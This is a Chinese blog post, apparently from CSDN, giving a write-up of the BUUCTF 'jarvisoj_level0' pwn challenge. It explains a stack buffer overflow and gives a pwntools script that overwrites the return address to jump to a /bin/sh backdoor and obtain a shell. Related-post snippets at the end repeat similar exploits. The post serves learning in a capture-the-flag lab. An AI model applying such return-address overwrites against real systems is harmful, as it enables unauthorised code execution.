[buuctf]jarvisoj_level0

已于 2022-05-31 00:24:42 修改
阅读量472 收藏 3
点赞数 1
分类专栏: PWN # buuctf 文章标签: python 安全 其他
于 2022-05-30 20:26:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_71081503/article/details/125053070
版权
buuctf 同时被 2 个专栏收录
32 篇文章 0 订阅
订阅专栏
PWN
30 篇文章 2 订阅
订阅专栏

目录

解题思路:

查保护:

 找逻辑:

写脚本(环境python3 pwntools库):

解题思路:

查保护:

还是先查保护,查到有NX保护,NX保护是禁止在栈里面执行。

 找逻辑:

所以我们要把栈溢出之后跳转到敏感的位置,64位,拖入ida寻找字符串。

这两个,后面是有用的,先进入/bin/sh这个个字符串里,这个字符串可以直接跳转到命令行去,那么我就让他跳转到.text:000000000040059A,发现跳过去,正好可以直接写入一个进去。

 找可以输入的地方,寻找main函数中间的可以输入的位置。

发现这里的buf函数是可以输入进去的 发现可以输入的字节很多,在查看多少才可以溢出。

return read(0, &buf, 0x200uLL);

 

需要0x80的个字节,可以覆盖到栈顶了,但是需要溢出,所以要覆盖掉以前的返回地址,所以还要+8个字节才可以覆盖到返回地址 ,所以总共需要输入0x80+8。

写脚本(环境python3 pwntools库):

from pwn import *
p = remote('node4.buuoj.cn',25994)
p.recvuntil('Hello, World\n')
pl = b'a'*0x80 + b'a'*8+p64(0x40059A) #0x80字节 + 8字节 + 返回地址
p.sendline(pl)
p.interactive()

之后利用payload就可以获取flag。

 最后获得的答案就是flag{f71e1cc2-aac6-4928-8dfa-73624932c9cd}。

逆向萌新
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
jarvisoj_level0
weixin_56301399的博客
07-21 573
在Functionswindow可以看到有一个callsystem()函数,按F5反汇编可以看到这是一个系统调用,且callsystem()函数的起始地址为0x400596。双击vulnerable_function()函数可以看到buf的长度只有0x80,即可用栈大小只有108字节,但是read()并没有限制输入,显然存在栈溢出漏洞。buf需覆盖0x80个字节覆盖,再加上rbp的0x8个字节,最后加上callsystem()函数的起始地址0x400596构成payload。信息就了解他是64位即可。...
buuctf ---- jarvisoj_level(全)
L0g1c的博客
01-22 3528
buuctf ----- jarvisoj_level0 运行一下程序 使用64位的IDA查看程序 查看vulner_function函数 发现buf存在溢出漏洞,buf是0x80,read了0x200 存在栈溢出漏洞 发现后门函数system("/bin/sh"),解题思路:修改read函数的ret address 为后门函数的地址。 编写exp from pwn import* io=remote("node4.buuoj.cn",26034) sys_addr=0x0400596 pa
Level_Set.zip_level set_level-set_set
07-15
这个"Level Set.zip_level set_level-set_set"压缩包文件包含了一个名为"Level_Set.m"的MATLAB程序,用于执行Level Set算法。 Level Set方法的核心思想是将图像中的边界或形状表示为一个零水平集(level set)函数...
level_set_image.rar_level set_level set 方程
09-21
这个"level_set_image.rar_level set_level set 方程"的压缩包内容可能包含了一个名为"level_set_image.m"的MATLAB程序,用于演示或实现Level Set方法在图像处理中的应用。 Level Set方法的核心在于用一个标量函数...
five_level_inverter.rar_CMLI_5level_harmonics inverter
07-15
标题中的“five_level_inverter.rar_CMLI_5level_harmonics inverter”表明了这是一个关于五电平电流源逆变器(Current Mode Logic Inverter,CMLI)的资料,重点在于其谐波特性。描述中的“harmonics of five level...
LRVOSUN.rar_level set_level set model
07-14
A new level set model without initialization, very time effi
psm.rar_5 LEVEL_level inverter_psim
09-20
标题"psm.rar_5 LEVEL_level inverter_psim"指的是一个关于5级逆变器的仿真项目,其中"5_LEVEL"强调了其多电平特性,"level inverter"是5级逆变器的英文表述,而"psim"则表明这个项目是使用PSIM(Power System ...
[BUUCTF]PWN8——jarvisoj_level0
mcmuyanga的博客
08-26 553
[BUUCTF]PWN8——jarvisoj_level0 题目网址:https://buuoj.cn/challenges#jarvisoj_level0 步骤: 例行检查,64位,开启了NX保护 nc一下,看看程序的大概执行流程,回显Hello,world之后让我们输入 用64位ida打开,shift+f12查看字符串,发现了 system 和 /bin/sh 双击跟进,ctrl+x找到调用 /bin/sh 的函数,找到了程序里的后门,shell_addr=0x400596 根据
BUUCTF刷题之路-jarvisoj_level01
最新发布
qq_30528603的博客
05-27 208
看到个read函数,而且能输入的最大字节数为512字节。而buf我们看到是128字节的限度,那应该是存在栈溢出的问题。而且我们直接看到有个后门函数,和前面几题的套路如出一辙。
[BUUCTF]PWN------jarvisoj_level0
BangSen1的博客
01-18 319
jarvisoj_level0 例行检查,64bit,开启NX保护。 nc一下,出现了Hello world,接着让我们输入,没有有用的信息。 ‘用IDA打开,看到了/bin/sh 双击跟进,Ctrl+x查看被什么调用,找到了后门,所以shell_addr=0x400596 查看主函数,寻找输入点。 可以看到buf的大小是0x80,但它读取时只读了0x20,可以溢出,覆盖返回地址为后门地址既可 exp flag ...
[每日一PWN]BUUCTF jarvisoj_level0
qq_55233040的博客
11-23 173
依旧是基础的ret2text。
BUUCTF - PWN】jarvisoj_level0
古月浪子的博客
04-05 660
checksec一下,栈溢出 IDA打开看看,很明显的溢出和后门函数,一道白给题 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' sl=lambda x:io.sendline(x) rl=lambda :io.rec...
BUUCTFjarvisoj_level3
m0_51251108的博客
12-28 343
BUUCTFjarvisoj_level3 标准的ret2libc 这里记一下找偏移的方法: readelf -a libc库文件|grep “puts” 或者用symbol这些 strings 文件 -tx|grep “/bin/sh” 抓出/bin/sh 可以找/bin/sh在libc中的地址 这里直接给出exp: from pwn import* r=remote('node3.buuoj.cn',28705) libc=ELF('./libc-2.23.so') elf=ELF('./
[BUUCTF]PWN——jarvisoj_level3_x64
BangSen1的博客
03-17 228
jarvisoj_level3_x64 例行检查,64位,开启NX保护。 运行一下。 IDA打开,查看main函数 function()函数 buf溢出漏洞,read之前已经调用过write函数,利用它来泄露libc版本 64位程序在传参的时候要先用到rdi,rsi,rdx,rcx,r8,r9这几个寄存器,都满了之后才会在栈上传参 利用ROPgadget找一下设置寄存器的指令 rdi=0x4006b3 rsi_r15=0x4006b1 payload='a'*(0x80+8)+p64(rdi)+
[CTF-PWN]攻防世界新手村-hello_pwn[wp]
murongxuege的博客
10-01 2542
事件起因(无语) 手残博主因在27日从根地址误删了自己两年半配置和使用的kali虚拟机。。。在一步步恢复环境配置的时候,从头到尾刷一遍题,总结思路。 题目分析 开启场景后,服务端会开启对应的端口,并在端口上部署和附件相同的ELF二进制可执行文件,我们要做的就是下载附件并在本地进行反汇编,反编译等操作分析程序漏洞,从而利用漏洞获取题目的flag。 从描述中可以看出当前程序是要进行年龄的输入操作的,有输入操作,还是在新手村,那么大概率是gets()等C函数输入漏洞,进一步猜测是普通的内存地址覆盖的题。 che
攻防世界pwn level0做题思路
nzw1134864657的博客
07-24 1843
先看看题目的各种保护机制 栈不可以执行,我们用IDA打开看看 写进一个hello world的字符串,然后执行vulnerable_function()函数 跟进函数里查看 这里我不是特别理解,writeup上是这样写的 “这是 vulnerable_function 函数,可以在栈上写0x200个字节,或许我们可以进行溢出,覆盖掉返回地址,劫持程序执行流,执行我们想执行的方法。通常我们的目...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

逆向萌新

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值